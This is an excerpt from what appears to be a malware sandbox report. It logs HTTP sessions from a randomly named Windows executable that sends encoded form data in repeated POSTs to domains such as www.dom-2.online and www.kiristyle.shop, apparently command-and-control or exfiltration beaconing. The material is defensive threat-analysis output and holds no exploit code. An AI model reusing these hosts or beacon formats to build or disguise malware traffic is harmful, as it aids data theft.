49 41 4d 76 6d 78 4b 6e 49 37 2b 70 74 37 5a 6b 6f 4d 56 43 70 52 56 42 74 44 68 4e 64 4e 77 2f 74 39 48 6d 71 68 32 63 59 2f 45 7a 37 55 49 6f 4b 68 4b 54 51 51 46 63 4c 66 32 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_F1lF5iUM+fZ8P/zFEB3xaNsxGAIAMvmxKnI7+pt7ZkoMVCpRVBtDhNdNw/t9Hmqh2cY/Ez7UIoKhKTQQFcLf2w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Aug 29, 2024 12:24:42.138798952 CEST	567	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjkzYTY2NTQtYWQ0ZS00ZDc2LTlkMjYtYzhkYjExYjY0MTY2IiwicGFnZV90aW1lIjoxNzI0OTI3MD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49736	199.59.243.226	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:24:45.310560942 CEST	1884	OUT	POST /6t1p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.dom-2.online Origin: http://www.dom-2.online Referer: http://www.dom-2.online/6t1p/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 30 73 58 62 71 38 2f 68 61 44 6d 4d 68 55 42 4c 6c 52 37 4f 42 4f 41 73 79 38 63 6f 48 4a 73 43 67 6a 73 2b 4c 2b 50 34 4f 30 4b 2b 2b 33 45 5a 59 67 79 32 46 58 50 38 6f 37 63 59 2f 45 42 36 69 57 4c 54 63 6e 79 4c 33 72 4c 58 4f 37 36 35 79 4c 39 58 36 76 54 35 6a 79 70 35 30 4d 48 61 62 69 72 2f 62 71 34 58 41 68 6b 70 34 46 33 38 37 45 72 59 36 50 47 46 56 6e 49 62 41 6a 71 34 37 55 41 4c 51 74 46 54 5a 31 4a 55 54 31 65 72 4e 54 6b 59 65 4c 4d 4f 49 2b 70 4e 6a 36 7a 46 78 4c 55 31 76 77 39 66 75 4a 4a 47 7a 6c 71 54 46 76 72 56 79 62 59 65 74 31 36 67 7a 38 43 47 43 5a 79 62 7a 39 73 7a 4e 6b 65 57 73 76 6b 72 48 4e 2b 68 5a 73 46 76 7a 62 6b 47 6d 6e 64 30 6a 53 57 45 45 46 4d 48 39 7a 68 36 63 65 6e 76 61 75 49 62 59 2f 4e 62 39 37 79 5a 45 64 4e 65 34 77 68 68 46 70 54 63 55 45 59 64 66 4f 50 68 38 6f 53 72 59 68 36 58 32 71 64 4d 4c 4a 33 61 53 66 55 49 4b 38 55 31 4c 37 73 77 2f 37 6e 72 72 69 70 75 36 77 36 6b 6b 61 6c 35 32 48 52 30 6c 58 77 4b 52 6e 76 42 78 68 [TRUNCATED] Data Ascii: cLStcv3=0sXbq8/haDmMhUBLlR7OBOAsy8coHJsCgjs+L+P4O0K++3EZYgy2FXP8o7cY/EB6iWLTcnyL3rLXO765yL9X6vT5jyp50MHabir/bq4XAhkp4F387ErY6PGFVnIbAjq47UALQtFTZ1JUT1erNTkYeLMOI+pNj6zFxLU1vw9fuJJGzlqTFvrVybYet16gz8CGCZybz9szNkeWsvkrHN+hZsFvzbkGmnd0jSWEEFMH9zh6cenvauIbY/Nb97yZEdNe4whhFpTcUEYdfOPh8oSrYh6X2qdMLJ3aSfUIK8U1L7sw/7nrripu6w6kkal52HR0lXwKRnvBxhxayEmyva1l8xVMx1mW1ZQ7Pn5m4sI08d6GdzFCvRzb48xfcub4qTexLll/mwDtDsCjKAgV7Apsogz2C1YGeCpVdRKHjzok6vcijyaehXlxl/p2jEzGH8COjRxsOVHz83tqKgeu38ZC52wrA294ZPIjVaaf6Ui1yBpgyHfSSeIy6aT6yRPaYhMnKjUv4M3M8uKagnP23TF0Bps0LxIPWeUMFc+LH+Xb4tv6PQJVWDvkQ+RdT9RfXMx11LskukGmzbd2zxgF0lpPQe8VqFGQ7Nm3vF/MKOL37yIatWb3XTXq4eNFMI9+lr3+/NO13fGPJaZC7AM8wXdbOUZfz7kzEEs7q6yFGMHKgsVHYITrrvm0rVldM+97ab55vOFitQGhTd1iiKDqP/fdtb+Zj7erxRAFu46XiXePcwrqjOjTnnsSr5oAK558G6gd+SmaqUXTMl7xCqm1hx+TX+1tFNnfRuGhcIDvikG1iteGnsn3y4dkKy//5CtZz2qDeaBFR/3XMKu8LUTvf70gxlddVHFuqp7J83JrxeNG6TD+pPsdmQz6wQLyhas+MRiy9z4BrdcjuRtw+wNn4VTKJkb4GINKEl7b6B9DhxE4wC3ZGa3TUM0nVg5h32PEnCQeeByLXBz9Cn+f5B8zwOnt6CzONlyzctyvKFGY1in0plVZ [TRUNCATED]
Aug 29, 2024 12:24:45.900371075 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 29 Aug 2024 10:24:45 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: ce409b11-6dcf-4144-981d-80d222d40a6e cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_F1lF5iUM+fZ8P/zFEB3xaNsxGAIAMvmxKnI7+pt7ZkoMVCpRVBtDhNdNw/t9Hmqh2cY/Ez7UIoKhKTQQFcLf2w== set-cookie: parking_session=ce409b11-6dcf-4144-981d-80d222d40a6e; expires=Thu, 29 Aug 2024 10:39:45 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 46 31 6c 46 35 69 55 4d 2b 66 5a 38 50 2f 7a 46 45 42 33 78 61 4e 73 78 47 41 49 41 4d 76 6d 78 4b 6e 49 37 2b 70 74 37 5a 6b 6f 4d 56 43 70 52 56 42 74 44 68 4e 64 4e 77 2f 74 39 48 6d 71 68 32 63 59 2f 45 7a 37 55 49 6f 4b 68 4b 54 51 51 46 63 4c 66 32 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_F1lF5iUM+fZ8P/zFEB3xaNsxGAIAMvmxKnI7+pt7ZkoMVCpRVBtDhNdNw/t9Hmqh2cY/Ez7UIoKhKTQQFcLf2w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Aug 29, 2024 12:24:45.900403023 CEST	567	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2U0MDliMTEtNmRjZi00MTQ0LTk4MWQtODBkMjIyZDQwYTZlIiwicGFnZV90aW1lIjoxNzI0OTI3MD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49737	199.59.243.226	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:24:47.843380928 CEST	589	OUT	GET /6t1p/?cLStcv3=5u/7pIClCxGMr2JDx2moDp4N5NUQR5UHhhh3f8bPAU6e1g5SUh+0OFL6u88M+0RJj1mDTEfrnKPtCcHZ9I9M5tKPqU536cb7UTbsX5MdChh4yVfj4lbg76/wDExADHyv3XJ8cq4=&oLy=-hKdflfxw6 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.dom-2.online User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E)
Aug 29, 2024 12:24:48.291115999 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 29 Aug 2024 10:24:48 GMT content-type: text/html; charset=utf-8 content-length: 1506 x-request-id: 94cb3150-7d34-4017-9b34-f33ae90b1a10 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vnM+/PyA1l6eGEVyCYX/3o4hcwnszpRALQ9bqPank5Y0yLmIkjik1fYYdbLjzYwhXshNY5rQkEav8YMoPkvPdA== set-cookie: parking_session=94cb3150-7d34-4017-9b34-f33ae90b1a10; expires=Thu, 29 Aug 2024 10:39:48 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 6e 4d 2b 2f 50 79 41 31 6c 36 65 47 45 56 79 43 59 58 2f 33 6f 34 68 63 77 6e 73 7a 70 52 41 4c 51 39 62 71 50 61 6e 6b 35 59 30 79 4c 6d 49 6b 6a 69 6b 31 66 59 59 64 62 4c 6a 7a 59 77 68 58 73 68 4e 59 35 72 51 6b 45 61 76 38 59 4d 6f 50 6b 76 50 64 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vnM+/PyA1l6eGEVyCYX/3o4hcwnszpRALQ9bqPank5Y0yLmIkjik1fYYdbLjzYwhXshNY5rQkEav8YMoPkvPdA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Aug 29, 2024 12:24:48.291135073 CEST	959	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTRjYjMxNTAtN2QzNC00MDE3LTliMzQtZjMzYWU5MGIxYTEwIiwicGFnZV90aW1lIjoxNzI0OTI3MD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49738	35.244.245.121	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:24:53.745980978 CEST	853	OUT	POST /m39s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 212 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.kiristyle.shop Origin: http://www.kiristyle.shop Referer: http://www.kiristyle.shop/m39s/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 5a 53 42 64 35 4f 42 79 2b 45 4f 56 67 77 47 48 76 57 2f 51 71 64 59 51 38 56 41 6d 65 2b 56 44 53 4b 4c 35 72 78 33 4f 47 51 62 53 79 44 67 48 64 63 52 70 49 72 2b 58 4d 65 75 54 54 74 68 70 79 31 46 49 6e 6a 53 59 37 65 2b 55 6f 7a 69 41 65 43 45 4d 6f 49 66 46 47 77 71 4d 50 7a 6f 65 6c 34 2b 52 6a 62 6d 6b 48 4e 4e 33 34 34 49 37 6c 35 6d 4a 37 35 53 57 56 45 53 36 59 6d 4f 49 41 6d 2f 35 71 2b 33 48 31 6b 32 50 63 77 4a 4c 76 46 58 55 6c 6b 5a 42 32 56 67 45 34 48 7a 38 32 35 76 35 38 4d 75 53 54 6d 72 2f 33 6f 69 38 6c 54 70 31 32 6d 59 74 43 33 6b 75 6a 4f 59 4d 56 32 4d 62 42 42 55 37 6d 69 56 62 Data Ascii: cLStcv3=ZSBd5OBy+EOVgwGHvW/QqdYQ8VAme+VDSKL5rx3OGQbSyDgHdcRpIr+XMeuTTthpy1FInjSY7e+UoziAeCEMoIfFGwqMPzoel4+RjbmkHNN344I7l5mJ75SWVES6YmOIAm/5q+3H1k2PcwJLvFXUlkZB2VgE4Hz825v58MuSTmr/3oi8lTp12mYtC3kujOYMV2MbBBU7miVb
Aug 29, 2024 12:24:54.240659952 CEST	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 29 Aug 2024 10:24:54 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/m39s/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49739	35.244.245.121	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:24:56.307312965 CEST	877	OUT	POST /m39s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.kiristyle.shop Origin: http://www.kiristyle.shop Referer: http://www.kiristyle.shop/m39s/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 5a 53 42 64 35 4f 42 79 2b 45 4f 56 76 7a 4f 48 70 46 58 51 72 39 59 66 67 46 41 6d 56 65 56 50 53 4b 50 35 72 31 75 52 47 69 76 53 33 57 63 48 63 64 52 70 4c 72 2b 58 48 2b 75 53 65 4e 67 6e 79 31 35 71 6e 69 2b 59 37 65 71 55 6f 7a 53 41 65 31 77 44 70 59 66 44 4f 51 71 4b 42 54 6f 65 6c 34 2b 52 6a 62 79 65 48 4e 46 33 34 4a 34 37 6c 59 6d 4b 33 5a 53 4a 57 45 53 36 63 6d 4f 4d 41 6d 2f 62 71 37 57 50 31 68 71 50 63 30 42 4c 73 58 76 62 2f 30 5a 39 70 6c 68 4d 38 46 57 37 34 59 4f 45 31 64 47 47 54 42 58 6e 32 65 6a 6d 35 67 70 57 6b 32 34 76 43 31 38 63 6a 75 59 6d 58 32 30 62 54 57 59 63 70 57 77 34 52 48 62 6d 32 6d 6a 33 64 35 54 31 56 75 75 33 38 41 69 32 51 77 3d 3d Data Ascii: cLStcv3=ZSBd5OBy+EOVvzOHpFXQr9YfgFAmVeVPSKP5r1uRGivS3WcHcdRpLr+XH+uSeNgny15qni+Y7eqUozSAe1wDpYfDOQqKBToel4+RjbyeHNF34J47lYmK3ZSJWES6cmOMAm/bq7WP1hqPc0BLsXvb/0Z9plhM8FW74YOE1dGGTBXn2ejm5gpWk24vC18cjuYmX20bTWYcpWw4RHbm2mj3d5T1Vuu38Ai2Qw==
Aug 29, 2024 12:24:56.791420937 CEST	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 29 Aug 2024 10:24:56 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/m39s/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49740	35.244.245.121	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:24:58.846409082 CEST	1890	OUT	POST /m39s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.kiristyle.shop Origin: http://www.kiristyle.shop Referer: http://www.kiristyle.shop/m39s/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.1; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729; .NET4.0E) Data Raw: 63 4c 53 74 63 76 33 3d 5a 53 42 64 35 4f 42 79 2b 45 4f 56 76 7a 4f 48 70 46 58 51 72 39 59 66 67 46 41 6d 56 65 56 50 53 4b 50 35 72 31 75 52 47 69 33 53 72 30 6b 48 63 36 74 70 4b 72 2b 58 45 2b 75 50 65 4e 67 71 79 31 68 75 6e 6a 43 79 37 63 53 55 72 53 79 41 56 6b 77 44 67 59 66 44 4d 51 71 50 50 7a 6f 78 6c 34 4f 4f 6a 62 69 65 48 4e 46 33 34 4b 51 37 73 70 6d 4b 31 5a 53 57 56 45 53 32 59 6d 4f 67 41 69 53 73 71 37 6a 74 31 56 6d 50 63 55 52 4c 75 69 37 62 6e 6b 5a 46 71 6c 67 4b 38 46 71 30 34 59 54 37 31 64 43 67 54 47 2f 6e 32 37 65 45 6d 67 64 76 78 78 51 66 43 48 34 6d 73 75 55 73 54 47 6b 31 41 45 73 68 68 56 4d 59 65 33 50 6d 69 56 57 4c 54 4b 4c 2b 62 5a 54 32 33 30 7a 49 44 34 42 63 38 54 43 50 33 51 79 77 6b 76 44 46 48 58 55 39 30 37 63 52 4c 30 6e 5a 75 6d 73 77 69 43 51 54 4c 38 37 71 50 61 33 73 51 79 2f 7a 70 43 78 70 66 64 38 4c 70 75 31 36 34 2b 46 49 69 4c 76 55 66 70 34 38 73 57 4c 59 6a 70 6f 33 77 49 70 53 69 7a 73 71 36 63 52 58 4e 46 77 6e 6b 65 73 67 54 77 70 54 4f 6d [TRUNCATED] Data Ascii: cLStcv3=ZSBd5OBy+EOVvzOHpFXQr9YfgFAmVeVPSKP5r1uRGi3Sr0kHc6tpKr+XE+uPeNgqy1hunjCy7cSUrSyAVkwDgYfDMQqPPzoxl4OOjbieHNF34KQ7spmK1ZSWVES2YmOgAiSsq7jt1VmPcURLui7bnkZFqlgK8Fq04YT71dCgTG/n27eEmgdvxxQfCH4msuUsTGk1AEshhVMYe3PmiVWLTKL+bZT230zID4Bc8TCP3QywkvDFHXU907cRL0nZumswiCQTL87qPa3sQy/zpCxpfd8Lpu164+FIiLvUfp48sWLYjpo3wIpSizsq6cRXNFwnkesgTwpTOmAVlK/ZQOXEeDFoSWG+jiHgjEdtVzhAirU6u4iJXD7xolRTFvqeuMrOMwy5jxHbBLqz+yQ/88dTzUR6tI85pHUuiGyE1FEpego9MOUGbCDts2Hly4vOm3O1CcT4MsdJqCNcAeK8HwPN05Gj/1bPEtOjp/sXiGsP/J2FpS7Zkrm6zRIW/8JIU3g+jCKs0gEkb+HOAufl5WEF5PEEXMhchFtxEFjzWKPxIB+eR/Emmm1T+8l/gfMmRtt52xoc6S6D2nh1ky3NsF8uNS09Ik24Dui/KD+WF2uYNAHWRNMdvWQY2SldJWWNZHB63SOM7Pu5uSwjkTdFT3FcKY8ryL2FRgeREO5vZpARF+kOEHYrvKDhOMYjnB26UIaDiilzVEPUJYYcHONTHK5XM06r1Mq+1ThMyPEyJlLxUyebe6dC1O9Bib+kqizv/bdcl8pfk3c8m5cyn7+VVsjqyQybdO0N6HF0uNBeZWR4GcTgbl2XXWQtTqsAucEDf5goc5UsbmYLYivKWWFbKfuLvKOQxGmwh9ZkI7VNbJ05Z3YWm2QOe7BPf0+q8pS6QUgHFahxlj1IegYTnAP6Qney1wj3HxILBL+q8f8DISLAVvHfPhdeeXYTRF9z9SQeKWICj9sbMrAVnv4jDC9tXWVBcKc5US1pZto59V9TTgQ0u4X4 [TRUNCATED]
Aug 29, 2024 12:24:59.345627069 CEST	357	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 29 Aug 2024 10:24:59 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kiristyle.shop/m39s/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49741	35.244.245.121	80	4176	C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Timestamp	Bytes transferred	Direction	Data
